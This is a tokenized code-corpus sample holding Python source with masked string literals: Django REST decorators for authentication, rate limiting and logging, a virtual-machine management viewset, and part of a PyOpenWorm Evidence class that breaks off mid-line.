<s> """<STR_LIT>""" <EOL> import math <EOL> import re <EOL> import json <EOL> import inspect <EOL> import time <EOL> from ovs . dal . lists . userlist import UserList <EOL> from ovs . dal . lists . storagerouterlist import StorageRouterList <EOL> from ovs . dal . helpers import Toolbox as DalToolbox <EOL> from rest_framework . response import Response <EOL> from toolbox import Toolbox <EOL> from rest_framework . exceptions import PermissionDenied , NotAuthenticated , NotAcceptable , Throttled <EOL> from rest_framework import status <EOL> from rest_framework . request import Request <EOL> from django . core . handlers . wsgi import WSGIRequest <EOL> from django . http import Http404 <EOL> from django . conf import settings <EOL> from ovs . dal . exceptions import ObjectNotFoundException <EOL> from backend . serializers . serializers import FullSerializer <EOL> from ovs . log . logHandler import LogHandler <EOL> from ovs . extensions . storage . volatilefactory import VolatileFactory <EOL> from ovs . extensions . generic . volatilemutex import VolatileMutex <EOL> logger = LogHandler . get ( '<STR_LIT>' ) <EOL> regex = re . compile ( '<STR_LIT>' ) <EOL> def _find_request ( args ) : <EOL> """<STR_LIT>""" <EOL> for item in args : <EOL> if isinstance ( item , Request ) or isinstance ( item , WSGIRequest ) : <EOL> return item <EOL> def required_roles ( roles ) : <EOL> """<STR_LIT>""" <EOL> def wrap ( f ) : <EOL> """<STR_LIT>""" <EOL> def new_function ( * args , ** kw ) : <EOL> """<STR_LIT>""" <EOL> request = _find_request ( args ) <EOL> if not hasattr ( request , '<STR_LIT:user>' ) or not hasattr ( request , '<STR_LIT>' ) : <EOL> raise NotAuthenticated ( ) <EOL> user = UserList . get_user_by_username ( request . user . username ) <EOL> if user is None : <EOL> raise NotAuthenticated ( ) <EOL> if not Toolbox . is_token_in_roles ( request . token , roles ) : <EOL> raise PermissionDenied ( '<STR_LIT>' % ( '<STR_LIT:U+002CU+0020>' . join ( roles ) ) ) <EOL> return f ( * args , ** kw ) <EOL> new_function . __name__ = f . __name__ <EOL> new_function . __module__ = f . __module__ <EOL> return new_function <EOL> return wrap <EOL> def load ( object_type = None , min_version = settings . VERSION [ <NUM_LIT:0> ] , max_version = settings . VERSION [ - <NUM_LIT:1> ] ) : <EOL> """<STR_LIT>""" <EOL> def wrap ( f ) : <EOL> """<STR_LIT>""" <EOL> def _try_parse ( value ) : <EOL> """<STR_LIT>""" <EOL> if value == '<STR_LIT:true>' or value == '<STR_LIT:True>' : <EOL> return True <EOL> if value == '<STR_LIT:false>' or value == '<STR_LIT:False>' : <EOL> return False <EOL> return value <EOL> def new_function ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> request = _find_request ( args ) <EOL> new_kwargs = { } <EOL> function_info = inspect . getargspec ( f ) <EOL> if function_info . defaults is None : <EOL> mandatory_vars = function_info . args [ <NUM_LIT:1> : ] <EOL> optional_vars = [ ] <EOL> else : <EOL> mandatory_vars = function_info . args [ <NUM_LIT:1> : - len ( function_info . defaults ) ] <EOL> optional_vars = function_info . args [ len ( mandatory_vars ) + <NUM_LIT:1> : ] <EOL> version = regex . match ( request . META [ '<STR_LIT>' ] ) . groupdict ( ) [ '<STR_LIT:version>' ] <EOL> versions = ( max ( min_version , settings . VERSION [ <NUM_LIT:0> ] ) , min ( max_version , settings . VERSION [ - <NUM_LIT:1> ] ) ) <EOL> if version == '<STR_LIT:*>' : <EOL> version = versions [ <NUM_LIT:1> ] <EOL> version = int ( version ) <EOL> if version < versions [ <NUM_LIT:0> ] or version > versions [ <NUM_LIT:1> ] : <EOL> raise NotAcceptable ( '<STR_LIT>' . format ( versions [ <NUM_LIT:0> ] , versions [ <NUM_LIT:1> ] , version ) ) <EOL> if '<STR_LIT:version>' in mandatory_vars : <EOL> new_kwargs [ '<STR_LIT:version>' ] = version <EOL> mandatory_vars . remove ( '<STR_LIT:version>' ) <EOL> if '<STR_LIT>' in mandatory_vars : <EOL> new_kwargs [ '<STR_LIT>' ] = request <EOL> mandatory_vars . remove ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' in kwargs and object_type is not None : <EOL> typename = object_type . __name__ . lower ( ) <EOL> try : <EOL> instance = object_type ( kwargs [ '<STR_LIT>' ] ) <EOL> if typename in mandatory_vars : <EOL> new_kwargs [ typename ] = instance <EOL> mandatory_vars . remove ( typename ) <EOL> except ObjectNotFoundException : <EOL> raise Http404 ( ) <EOL> if '<STR_LIT>' in mandatory_vars : <EOL> storagerouter = StorageRouterList . get_by_machine_id ( settings . UNIQUE_ID ) <EOL> new_kwargs [ '<STR_LIT>' ] = storagerouter <EOL> mandatory_vars . remove ( '<STR_LIT>' ) <EOL> post_data = request . DATA if hasattr ( request , '<STR_LIT>' ) else request . POST <EOL> get_data = request . QUERY_PARAMS if hasattr ( request , '<STR_LIT>' ) else request . GET <EOL> for name in mandatory_vars : <EOL> if name in kwargs : <EOL> new_kwargs [ name ] = kwargs [ name ] <EOL> else : <EOL> if name not in post_data : <EOL> if name not in get_data : <EOL> raise NotAcceptable ( '<STR_LIT>' . format ( name ) ) <EOL> new_kwargs [ name ] = _try_parse ( get_data [ name ] ) <EOL> else : <EOL> new_kwargs [ name ] = _try_parse ( post_data [ name ] ) <EOL> for name in optional_vars : <EOL> if name in kwargs : <EOL> new_kwargs [ name ] = kwargs [ name ] <EOL> else : <EOL> if name in post_data : <EOL> new_kwargs [ name ] = _try_parse ( post_data [ name ] ) <EOL> elif name in get_data : <EOL> new_kwargs [ name ] = _try_parse ( get_data [ name ] ) <EOL> return f ( args [ <NUM_LIT:0> ] , ** new_kwargs ) <EOL> new_function . __name__ = f . __name__ <EOL> new_function . __module__ = f . __module__ <EOL> return new_function <EOL> return wrap <EOL> def return_list ( object_type , default_sort = None ) : <EOL> """<STR_LIT>""" <EOL> def wrap ( f ) : <EOL> """<STR_LIT>""" <EOL> def new_function ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> request = _find_request ( args ) <EOL> sort = request . QUERY_PARAMS . get ( '<STR_LIT>' ) <EOL> if sort is None and default_sort is not None : <EOL> sort = default_sort <EOL> sort = None if sort is None else [ s for s in reversed ( sort . split ( '<STR_LIT:U+002C>' ) ) ] <EOL> page = request . QUERY_PARAMS . get ( '<STR_LIT>' ) <EOL> page = int ( page ) if page is not None and page . isdigit ( ) else None <EOL> page_size = request . QUERY_PARAMS . get ( '<STR_LIT>' ) <EOL> page_size = int ( page_size ) if page_size is not None and page_size . isdigit ( ) else None <EOL> page_size = page_size if page_size in [ <NUM_LIT:10> , <NUM_LIT> , <NUM_LIT:50> , <NUM_LIT:100> ] else <NUM_LIT:10> <EOL> contents = request . QUERY_PARAMS . get ( '<STR_LIT>' ) <EOL> contents = None if contents is None else contents . split ( '<STR_LIT:U+002C>' ) <EOL> if '<STR_LIT>' not in kwargs : <EOL> kwargs [ '<STR_LIT>' ] = { } <EOL> kwargs [ '<STR_LIT>' ] [ '<STR_LIT>' ] = sort is not None or contents is not None <EOL> data_list = f ( * args , ** kwargs ) <EOL> guid_list = isinstance ( data_list , list ) and len ( data_list ) > <NUM_LIT:0> and isinstance ( data_list [ <NUM_LIT:0> ] , basestring ) <EOL> if sort is not None : <EOL> if guid_list is True : <EOL> data_list = [ object_type ( guid ) for guid in data_list ] <EOL> guid_list = False <EOL> for sort_item in sort : <EOL> desc = sort_item [ <NUM_LIT:0> ] == '<STR_LIT:->' <EOL> field = sort_item [ <NUM_LIT:1> if desc else <NUM_LIT:0> : ] <EOL> data_list . sort ( key = lambda e : DalToolbox . extract_key ( e , field ) , reverse = desc ) <EOL> total_items = len ( data_list ) <EOL> page_metadata = { '<STR_LIT>' : total_items , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : page_size , <EOL> '<STR_LIT>' : min ( <NUM_LIT:1> , total_items ) , <EOL> '<STR_LIT>' : total_items } <EOL> if page is not None : <EOL> max_page = int ( math . ceil ( total_items / ( page_size * <NUM_LIT:1.0> ) ) ) <EOL> if page > max_page : <EOL> page = max_page <EOL> if page == <NUM_LIT:0> : <EOL> start_number = - <NUM_LIT:1> <EOL> end_number = <NUM_LIT:0> <EOL> else : <EOL> start_number = ( page - <NUM_LIT:1> ) * page_size <EOL> end_number = start_number + page_size <EOL> data_list = data_list [ start_number : end_number ] <EOL> page_metadata = dict ( page_metadata . items ( ) + { '<STR_LIT>' : max ( <NUM_LIT:1> , page ) , <EOL> '<STR_LIT>' : max ( <NUM_LIT:1> , max_page ) , <EOL> '<STR_LIT>' : start_number + <NUM_LIT:1> , <EOL> '<STR_LIT>' : min ( total_items , end_number ) } . items ( ) ) <EOL> if contents is not None : <EOL> if guid_list is True : <EOL> data_list = [ object_type ( guid ) for guid in data_list ] <EOL> data = FullSerializer ( object_type , contents = contents , instance = data_list , many = True ) . data <EOL> else : <EOL> if guid_list is False : <EOL> data_list = [ item . guid for item in data_list ] <EOL> data = data_list <EOL> result = { '<STR_LIT:data>' : data , <EOL> '<STR_LIT>' : page_metadata , <EOL> '<STR_LIT>' : contents , <EOL> '<STR_LIT>' : [ s for s in reversed ( sort ) ] if sort else sort } <EOL> return Response ( result , status = status . HTTP_200_OK ) <EOL> new_function . __name__ = f . __name__ <EOL> new_function . __module__ = f . __module__ <EOL> return new_function <EOL> return wrap <EOL> def return_object ( object_type ) : <EOL> """<STR_LIT>""" <EOL> def wrap ( f ) : <EOL> """<STR_LIT>""" <EOL> def new_function ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> request = _find_request ( args ) <EOL> contents = request . QUERY_PARAMS . get ( '<STR_LIT>' ) <EOL> contents = None if contents is None else contents . split ( '<STR_LIT:U+002C>' ) <EOL> obj = f ( * args , ** kwargs ) <EOL> return Response ( FullSerializer ( object_type , contents = contents , instance = obj ) . data , status = status . HTTP_200_OK ) <EOL> new_function . __name__ = f . __name__ <EOL> new_function . __module__ = f . __module__ <EOL> return new_function <EOL> return wrap <EOL> def return_task ( ) : <EOL> """<STR_LIT>""" <EOL> def wrap ( f ) : <EOL> """<STR_LIT>""" <EOL> def new_function ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> task = f ( * args , ** kwargs ) <EOL> return Response ( task . id , status = status . HTTP_200_OK ) <EOL> new_function . __name__ = f . __name__ <EOL> new_function . __module__ = f . __module__ <EOL> return new_function <EOL> return wrap <EOL> def return_plain ( ) : <EOL> """<STR_LIT>""" <EOL> def wrap ( f ) : <EOL> """<STR_LIT>""" <EOL> def new_function ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> result = f ( * args , ** kwargs ) <EOL> return Response ( result , status = status . HTTP_200_OK ) <EOL> new_function . __name__ = f . __name__ <EOL> new_function . __module__ = f . __module__ <EOL> return new_function <EOL> return wrap <EOL> def limit ( amount , per , timeout ) : <EOL> """<STR_LIT>""" <EOL> def wrap ( f ) : <EOL> """<STR_LIT>""" <EOL> def new_function ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> request = _find_request ( args ) <EOL> now = time . time ( ) <EOL> key = '<STR_LIT>' . format ( <EOL> f . __module__ , f . __name__ , <EOL> request . META [ '<STR_LIT>' ] <EOL> ) <EOL> client = VolatileFactory . get_client ( ) <EOL> with VolatileMutex ( key ) : <EOL> rate_info = client . get ( key , { '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : None } ) <EOL> active_timeout = rate_info [ '<STR_LIT>' ] <EOL> if active_timeout is not None : <EOL> if active_timeout > now : <EOL> logger . warning ( '<STR_LIT>' . format ( key , active_timeout - now ) ) <EOL> raise Throttled ( wait = active_timeout - now ) <EOL> else : <EOL> rate_info [ '<STR_LIT>' ] = None <EOL> rate_info [ '<STR_LIT>' ] = [ call for call in rate_info [ '<STR_LIT>' ] if call > ( now - per ) ] + [ now ] <EOL> calls = len ( rate_info [ '<STR_LIT>' ] ) <EOL> if calls > amount : <EOL> rate_info [ '<STR_LIT>' ] = now + timeout <EOL> client . set ( key , rate_info ) <EOL> logger . warning ( '<STR_LIT>' . format ( key , timeout ) ) <EOL> raise Throttled ( wait = timeout ) <EOL> client . set ( key , rate_info ) <EOL> return f ( * args , ** kwargs ) <EOL> new_function . __name__ = f . __name__ <EOL> new_function . __module__ = f . __module__ <EOL> return new_function <EOL> return wrap <EOL> def log ( log_slow = True ) : <EOL> """<STR_LIT>""" <EOL> def wrap ( f ) : <EOL> """<STR_LIT>""" <EOL> def new_function ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> request = _find_request ( args ) <EOL> method_args = list ( args ) [ : ] <EOL> method_args = method_args [ method_args . index ( request ) + <NUM_LIT:1> : ] <EOL> metadata = { '<STR_LIT>' : dict ( ( str ( key ) , str ( value ) ) for key , value in request . META . iteritems ( ) ) , <EOL> '<STR_LIT>' : dict ( ( str ( key ) , str ( value ) ) for key , value in request . REQUEST . iteritems ( ) ) , <EOL> '<STR_LIT>' : dict ( ( str ( key ) , str ( value ) ) for key , value in request . COOKIES . iteritems ( ) ) } <EOL> _logger = LogHandler . get ( '<STR_LIT>' , name = '<STR_LIT>' ) <EOL> _logger . info ( '<STR_LIT>' . format ( <EOL> f . __module__ , <EOL> f . __name__ , <EOL> getattr ( request , '<STR_LIT>' ) . user_guid if hasattr ( request , '<STR_LIT>' ) else None , <EOL> json . dumps ( method_args ) , <EOL> json . dumps ( kwargs ) , <EOL> json . dumps ( metadata ) <EOL> ) ) <EOL> start = time . time ( ) <EOL> return_value = f ( * args , ** kwargs ) <EOL> duration = time . time ( ) - start <EOL> if duration > <NUM_LIT:5> and log_slow is True : <EOL> logger . warning ( '<STR_LIT>' . format ( f . __module__ , f . __name__ , round ( duration , <NUM_LIT:2> ) ) ) <EOL> return return_value <EOL> new_function . __name__ = f . __name__ <EOL> new_function . __module__ = f . __module__ <EOL> return new_function <EOL> return wrap </s>
<s> """<STR_LIT>""" <EOL> import json <EOL> from rest_framework import viewsets <EOL> from rest_framework . permissions import IsAuthenticated <EOL> from rest_framework . decorators import action , link <EOL> from rest_framework . exceptions import NotAcceptable <EOL> from django . http import Http404 <EOL> from ovs . dal . lists . vmachinelist import VMachineList <EOL> from ovs . dal . hybrids . vmachine import VMachine <EOL> from ovs . dal . hybrids . pmachine import PMachine <EOL> from ovs . dal . hybrids . vpool import VPool <EOL> from ovs . dal . datalist import DataList <EOL> from ovs . lib . vmachine import VMachineController <EOL> from ovs . dal . exceptions import ObjectNotFoundException <EOL> from backend . decorators import required_roles , load , return_list , return_object , return_task , log <EOL> class VMachineViewSet ( viewsets . ViewSet ) : <EOL> """<STR_LIT>""" <EOL> permission_classes = ( IsAuthenticated , ) <EOL> prefix = r'<STR_LIT>' <EOL> base_name = '<STR_LIT>' <EOL> @ log ( ) <EOL> @ required_roles ( [ '<STR_LIT>' ] ) <EOL> @ return_list ( VMachine , '<STR_LIT>' ) <EOL> @ load ( ) <EOL> def list ( self , vpoolguid = None , query = None ) : <EOL> """<STR_LIT>""" <EOL> if vpoolguid is not None : <EOL> vpool = VPool ( vpoolguid ) <EOL> vmachine_guids = [ ] <EOL> vmachines = [ ] <EOL> for vdisk in vpool . vdisks : <EOL> if vdisk . vmachine_guid is not None and vdisk . vmachine_guid not in vmachine_guids : <EOL> vmachine_guids . append ( vdisk . vmachine . guid ) <EOL> if vdisk . vmachine . is_vtemplate is False : <EOL> vmachines . append ( vdisk . vmachine ) <EOL> elif query is not None : <EOL> query = json . loads ( query ) <EOL> vmachines = DataList ( VMachine , query ) <EOL> else : <EOL> vmachines = VMachineList . get_vmachines ( ) <EOL> return vmachines <EOL> @ log ( ) <EOL> @ required_roles ( [ '<STR_LIT>' ] ) <EOL> @ return_object ( VMachine ) <EOL> @ load ( VMachine ) <EOL> def retrieve ( self , vmachine ) : <EOL> """<STR_LIT>""" <EOL> return vmachine <EOL> @ action ( ) <EOL> @ log ( ) <EOL> @ required_roles ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> @ return_task ( ) <EOL> @ load ( VMachine ) <EOL> def delete_vtemplate ( self , vmachine ) : <EOL> """<STR_LIT>""" <EOL> if not vmachine . is_vtemplate : <EOL> raise NotAcceptable ( '<STR_LIT>' ) <EOL> return VMachineController . delete . delay ( machineguid = vmachine . guid ) <EOL> @ action ( ) <EOL> @ log ( ) <EOL> @ required_roles ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> @ return_task ( ) <EOL> @ load ( VMachine ) <EOL> def rollback ( self , vmachine , timestamp ) : <EOL> """<STR_LIT>""" <EOL> if vmachine . is_vtemplate : <EOL> raise NotAcceptable ( '<STR_LIT>' ) <EOL> return VMachineController . rollback . delay ( machineguid = vmachine . guid , <EOL> timestamp = timestamp ) <EOL> @ action ( ) <EOL> @ log ( ) <EOL> @ required_roles ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> @ return_task ( ) <EOL> @ load ( VMachine ) <EOL> def snapshot ( self , vmachine , name , consistent , sticky ) : <EOL> """<STR_LIT>""" <EOL> if vmachine . is_vtemplate : <EOL> raise NotAcceptable ( '<STR_LIT>' ) <EOL> label = str ( name ) <EOL> is_consistent = True if consistent else False <EOL> is_sticky = True if sticky else False <EOL> return VMachineController . snapshot . delay ( machineguid = vmachine . guid , <EOL> label = label , <EOL> is_consistent = is_consistent , <EOL> is_automatic = False , <EOL> is_sticky = is_sticky ) <EOL> @ link ( ) <EOL> @ log ( ) <EOL> @ required_roles ( [ '<STR_LIT>' ] ) <EOL> @ return_list ( VMachine ) <EOL> @ load ( VMachine ) <EOL> def get_children ( self , vmachine , hints ) : <EOL> """<STR_LIT>""" <EOL> children_vmachine_guids = [ ] <EOL> children_vmachines = [ ] <EOL> if vmachine . is_vtemplate is False : <EOL> raise NotAcceptable ( '<STR_LIT>' ) <EOL> for vdisk in vmachine . vdisks : <EOL> for cdisk in vdisk . child_vdisks : <EOL> if cdisk . vmachine_guid not in children_vmachine_guids : <EOL> children_vmachine_guids . append ( cdisk . vmachine_guid ) <EOL> if hints [ '<STR_LIT>' ] is True : <EOL> children_vmachines . append ( cdisk . vmachine ) <EOL> return children_vmachines if hints [ '<STR_LIT>' ] is True else children_vmachine_guids <EOL> @ action ( ) <EOL> @ log ( ) <EOL> @ required_roles ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> @ return_task ( ) <EOL> @ load ( VMachine ) <EOL> def set_as_template ( self , vmachine ) : <EOL> """<STR_LIT>""" <EOL> return VMachineController . set_as_template . delay ( machineguid = vmachine . guid ) <EOL> @ action ( ) <EOL> @ log ( ) <EOL> @ required_roles ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> @ return_task ( ) <EOL> @ load ( VMachine ) <EOL> def create_from_template ( self , vmachine , pmachineguid , name , description ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> pmachine = PMachine ( pmachineguid ) <EOL> except ObjectNotFoundException : <EOL> raise Http404 ( '<STR_LIT>' ) <EOL> if vmachine . is_vtemplate is False : <EOL> raise NotAcceptable ( '<STR_LIT>' ) <EOL> return VMachineController . create_from_template . delay ( machineguid = vmachine . guid , <EOL> pmachineguid = pmachine . guid , <EOL> name = str ( name ) , <EOL> description = str ( description ) ) <EOL> @ action ( ) <EOL> @ log ( ) <EOL> @ required_roles ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> @ return_task ( ) <EOL> @ load ( VMachine ) <EOL> def create_multiple_from_template ( self , vmachine , pmachineguids , amount , start , name , description ) : <EOL> """<STR_LIT>""" <EOL> if len ( pmachineguids ) == <NUM_LIT:0> : <EOL> raise NotAcceptable <EOL> try : <EOL> for pmachienguid in pmachineguids : <EOL> _ = PMachine ( pmachienguid ) <EOL> except ObjectNotFoundException : <EOL> raise Http404 ( '<STR_LIT>' ) <EOL> if vmachine . is_vtemplate is False : <EOL> raise NotAcceptable ( '<STR_LIT>' ) <EOL> if not isinstance ( amount , int ) or not isinstance ( start , int ) : <EOL> raise NotAcceptable ( '<STR_LIT>' ) <EOL> amount = max ( <NUM_LIT:1> , amount ) <EOL> start = max ( <NUM_LIT:0> , start ) <EOL> return VMachineController . create_multiple_from_template . delay ( machineguid = vmachine . guid , <EOL> pmachineguids = pmachineguids , <EOL> amount = amount , <EOL> start = start , <EOL> name = str ( name ) , <EOL> description = str ( description ) ) <EOL> @ link ( ) <EOL> @ log ( ) <EOL> @ required_roles ( [ '<STR_LIT>' ] ) <EOL> @ return_list ( PMachine ) <EOL> @ load ( VMachine ) <EOL> def get_target_pmachines ( self , vmachine , hints ) : <EOL> """<STR_LIT>""" <EOL> if not vmachine . is_vtemplate : <EOL> raise NotAcceptable ( '<STR_LIT>' ) <EOL> vpool_guids = [ ] <EOL> vpools = [ ] <EOL> if vmachine . vpool is not None : <EOL> if vmachine . vpool_guid not in vpool_guids : <EOL> vpools . append ( vmachine . vpool ) <EOL> vpool_guids . append ( vmachine . vpool_guid ) <EOL> for vdisk in vmachine . vdisks : <EOL> if vdisk . vpool_guid not in vpool_guids : <EOL> vpools . append ( vdisk . vpool ) <EOL> vpool_guids . append ( vdisk . vpool_guid ) <EOL> pmachine_guids = None <EOL> pmachines = { } <EOL> for vpool in vpools : <EOL> this_pmachine_guids = set ( ) <EOL> for storagedriver in vpool . storagedrivers : <EOL> this_pmachine_guids . add ( storagedriver . storagerouter . pmachine_guid ) <EOL> if hints [ '<STR_LIT>' ] is True : <EOL> pmachines [ storagedriver . storagerouter . pmachine_guid ] = storagedriver . storagerouter . pmachine <EOL> if pmachine_guids is None : <EOL> pmachine_guids = list ( this_pmachine_guids ) <EOL> else : <EOL> pmachine_guids = list ( this_pmachine_guids & set ( pmachine_guids ) ) <EOL> return pmachine_guids if hints [ '<STR_LIT>' ] is False else [ pmachines [ guid ] for guid in pmachine_guids ] <EOL> @ action ( ) <EOL> @ log ( ) <EOL> @ required_roles ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> @ return_task ( ) <EOL> @ load ( VMachine ) <EOL> def clone_from_snapshot ( self , vmachine , snapshot_timestamp , new_machine_name ) : <EOL> """<STR_LIT>""" <EOL> return VMachineController . clone . delay ( machineguid = vmachine . guid , <EOL> timestamp = snapshot_timestamp , <EOL> name = new_machine_name ) <EOL> @ action ( ) <EOL> @ log ( ) <EOL> @ required_roles ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> @ return_task ( ) <EOL> @ load ( VMachine ) <EOL> def delete_snapshot ( self , vmachine , snapshot_timestamp ) : <EOL> """<STR_LIT>""" <EOL> return VMachineController . delete_snapshot . delay ( vmachineguid = vmachine . guid , <EOL> timestamp = snapshot_timestamp ) </s>
<s> from PyOpenWorm . pProperty import Property <EOL> from PyOpenWorm . dataObject import DataObject <EOL> class EvidenceError ( Exception ) : <EOL> pass <EOL> def _pubmed_uri_to_pmid ( uri ) : <EOL> from urlparse import urlparse <EOL> parsed = urlparse ( uri ) <EOL> pmid = int ( parsed . path . split ( "<STR_LIT:/>" ) [ <NUM_LIT:2> ] ) <EOL> return pmid <EOL> def _doi_uri_to_doi ( uri ) : <EOL> from urlparse import urlparse <EOL> from urllib2 import unquote <EOL> parsed = urlparse ( uri ) <EOL> doi = parsed . path . split ( "<STR_LIT:/>" ) [ <NUM_LIT:1> ] <EOL> doi = unquote ( doi ) <EOL> return doi <EOL> def _url_request ( url , headers = { } ) : <EOL> import urllib2 as U <EOL> try : <EOL> r = U . Request ( url , headers = headers ) <EOL> s = U . urlopen ( r , timeout = <NUM_LIT:1> ) <EOL> return s <EOL> except U . HTTPError : <EOL> return "<STR_LIT>" <EOL> except U . URLError : <EOL> return "<STR_LIT>" <EOL> def _json_request ( url ) : <EOL> import json <EOL> headers = { '<STR_LIT:Content-Type>' : '<STR_LIT:application/json>' } <EOL> try : <EOL> return json . load ( _url_request ( url , headers ) ) <EOL> except BaseException : <EOL> return { } <EOL> class AssertsAllAbout ( Property ) : <EOL> multiple = True <EOL> linkName = "<STR_LIT>" <EOL> def __init__ ( self , ** kwargs ) : <EOL> Property . __init__ ( self , '<STR_LIT>' , ** kwargs ) <EOL> @ property <EOL> def values ( self ) : <EOL> return [ ] <EOL> def set ( self , o , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . owner . asserts ( o ) <EOL> for p in o . properties : <EOL> self . owner . asserts ( p ) <EOL> def get ( self , ** kwargs ) : <EOL> ns = { "<STR_LIT>" : self . base_namespace , <EOL> "<STR_LIT>" : self . rdf_namespace , <EOL> "<STR_LIT>" : self . base_namespace [ "<STR_LIT>" ] + "<STR_LIT:/>" , <EOL> "<STR_LIT>" : self . base_namespace [ "<STR_LIT>" ] + "<STR_LIT:/>" <EOL> } <EOL> q = """<STR_LIT>""" <EOL> def triples ( self , ** kwargs ) : <EOL> return [ ] <EOL> class Evidence ( DataObject ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( <EOL> self , <EOL> conf = False , <EOL> author = None , <EOL> uri = None , <EOL> year = None , <EOL> date = None , <EOL> title = None , <EOL> doi = None , <EOL> wbid = None , <EOL> wormbaseid = None , <EOL> wormbase = None , <EOL> bibtex = None , <EOL> pmid = None , <EOL> pubmed = None , <EOL> ** kwargs ) : <EOL> super ( Evidence , self ) . __init__ ( conf = conf , ** kwargs ) <EOL> self . _fields = dict ( ) <EOL> Evidence . ObjectProperty ( '<STR_LIT>' , multiple = True , owner = self ) <EOL> AssertsAllAbout ( owner = self ) <EOL> multivalued_fields = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> other_fields = ( '<STR_LIT>' , '<STR_LIT:title>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . id_precedence = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> for x in multivalued_fields : <EOL> Evidence . DatatypeProperty ( x , multiple = True , owner = self ) <EOL> for x in other_fields : <EOL> Evidence . DatatypeProperty ( x , owner = self ) <EOL> if pmid is not None : <EOL> self . _fields [ '<STR_LIT>' ] = pmid <EOL> elif pubmed is not None : <EOL> self . _fields [ '<STR_LIT>' ] = pubmed <EOL> if '<STR_LIT>' in self . _fields : <EOL> self . _pubmed_extract ( ) <EOL> self . pmid ( self . _fields [ '<STR_LIT>' ] ) <EOL> if wbid is not None : <EOL> self . _fields [ '<STR_LIT>' ] = wbid <EOL> elif wormbase is not None : <EOL> self . _fields [ '<STR_LIT>' ] = wormbase <EOL> elif wormbaseid is not None : <EOL> self . _fields [ '<STR_LIT>' ] = wormbaseid <EOL> if '<STR_LIT>' in self . _fields : <EOL> self . _wormbase_extract ( ) <EOL> self . wbid ( self . _fields [ '<STR_LIT>' ] ) <EOL> if doi is not None : <EOL> self . _fields [ '<STR_LIT>' ] = doi <EOL> self . _crossref_doi_extract ( ) <EOL> self . doi ( doi ) <EOL> if bibtex is not None : <EOL> self . _fields [ '<STR_LIT>' ] = bibtex <EOL> if year is not None : <EOL> self . year ( year ) <EOL> elif date is not None : <EOL> self . year ( date ) <EOL> if title is not None : <EOL> self . title ( title ) <EOL> if author is not None : <EOL> self . author ( author ) <EOL> def add_data ( self , k , v ) : <EOL> """<STR_LIT>""" <EOL> self . _fields [ k ] = v <EOL> dp = Evidence . DatatypeProperty ( k , owner = self ) <EOL> dp ( v ) <EOL> @ property <EOL> def defined ( self ) : <EOL> if super ( Evidence , self ) . defined : <EOL> return True <EOL> else : <EOL> for x in self . id_precedence : <EOL> if getattr ( self , x ) . has_defined_value ( ) : <EOL> return True <EOL> def identifier ( self ) : <EOL> if super ( Evidence , self ) . defined : <EOL> return super ( Evidence , self ) . identifier ( ) <EOL> for idKind in self . id_precedence : <EOL> idprop = getattr ( self , idKind ) <EOL> if idprop . has_defined_value ( ) : <EOL> s = str ( idKind ) + "<STR_LIT::>" + idprop . defined_values [ <NUM_LIT:0> ] . identifier ( ) . n3 ( ) <EOL> return self . make_identifier ( s ) <EOL> def _wormbase_extract ( self ) : <EOL> wbid = self . _fields [ '<STR_LIT>' ] <EOL> def wbRequest ( ident , field ) : <EOL> return _json_request ( <EOL> "<STR_LIT>" + <EOL> wbid + <EOL> "<STR_LIT:/>" + <EOL> field ) <EOL> j = wbRequest ( wbid , '<STR_LIT>' ) <EOL> if '<STR_LIT>' in j : <EOL> f = j [ '<STR_LIT>' ] <EOL> if '<STR_LIT:data>' in f : <EOL> self . author ( [ x [ '<STR_LIT:label>' ] for x in f [ '<STR_LIT:data>' ] ] ) <EOL> elif '<STR_LIT:name>' in f : <EOL> self . author ( f [ '<STR_LIT:name>' ] [ '<STR_LIT:data>' ] [ '<STR_LIT:label>' ] ) <EOL> j = wbRequest ( wbid , '<STR_LIT>' ) <EOL> if '<STR_LIT>' in j : <EOL> f = j [ '<STR_LIT>' ] <EOL> if '<STR_LIT:data>' in f : <EOL> self . year ( f [ '<STR_LIT:data>' ] [ '<STR_LIT:label>' ] ) <EOL> elif '<STR_LIT:name>' in f : <EOL> self . year ( f [ '<STR_LIT:name>' ] [ '<STR_LIT:data>' ] [ '<STR_LIT:label>' ] ) <EOL> def _crossref_doi_extract ( self ) : <EOL> def crRequest ( doi ) : <EOL> import urllib as U <EOL> data = { '<STR_LIT:q>' : doi } <EOL> data_encoded = U . urlencode ( data ) <EOL> return _json_request ( <EOL> '<STR_LIT>' % <EOL> data_encoded ) <EOL> doi = self . _fields [ '<STR_LIT>' ] <EOL> if doi [ : <NUM_LIT:4> ] == '<STR_LIT:http>' : <EOL> doi = _doi_uri_to_doi ( doi ) <EOL> r = crRequest ( doi ) <EOL> if len ( r ) > <NUM_LIT:0> : <EOL> extra_data = r [ <NUM_LIT:0> ] [ '<STR_LIT>' ] . split ( '<STR_LIT>' ) <EOL> fields = ( x . split ( "<STR_LIT:=>" ) for x in extra_data ) <EOL> fields = [ [ y . replace ( '<STR_LIT:+>' , '<STR_LIT:U+0020>' ) . strip ( ) for y in x ] for x in 